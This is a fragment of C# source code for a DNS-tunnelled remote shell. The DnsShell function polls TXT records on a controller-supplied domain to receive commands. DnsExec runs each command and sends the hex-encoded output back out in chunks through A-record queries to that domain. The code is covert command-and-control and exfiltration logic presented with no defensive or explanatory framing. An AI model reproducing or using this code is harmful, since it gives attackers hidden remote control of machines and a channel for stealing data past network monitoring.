static void DnsShell(string Domain, string IPAddr)
{
DnsClass dnsClass = new DnsClass();
if (IPAddr.Length > 0)
{
dnsClass.DnsServerIp = IPAddr;
}
while (true)
{
string rnd = RandomNumber(1000, 9999).ToString() + RandomString(8, false) + "." + Domain;
List <string> txtRecords = dnsClass.QueryTXT(rnd);
if (txtRecords == null)
{
continue;
}
string responseCmd = String.Join(" ", txtRecords.ToArray());
Console.WriteLine(responseCmd);
if (responseCmd.ToLower().StartsWith("nocmd") || responseCmd.Length == 0)
{
continue;
}
if (responseCmd.ToLower().StartsWith("exit"))
{
break;
}
DnsExec(dnsClass, responseCmd, Domain);
}
}
static void DnsExec(DnsClass dnsClass, string cmd, string domain)
{
string result = RunCmd(cmd);
byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(result);
string bitString = BitConverter.ToString(sendbytes).Replace("-", "");
int bitLen = bitString.Length;
int split = 50;
int repeat = (int)Math.Floor((double)(bitLen / split));
int remainder = bitLen % split;
int repeatR = 0;
if (remainder > 0)
{
repeatR = repeat + 1;
}
string rnd = RandomString(8, false) + ".CMDC" + repeatR.ToString() + "." + domain;
dnsClass.QueryA(rnd);
int i = 0;
for ( ; i < repeat; i++)
{
string subStr = bitString.Substring(i * split, split);
rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr + "." + domain;
dnsClass.QueryA(rnd);
}
if (remainder > 0)
{
string subStr2 = bitString.Substring(bitLen - remainder);
i += 1;
rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr2 + "." + domain;
dnsClass.QueryA(rnd);
}
rnd = RandomString(8, false) + ".END." + domain;
dnsClass.QueryA(rnd);
}
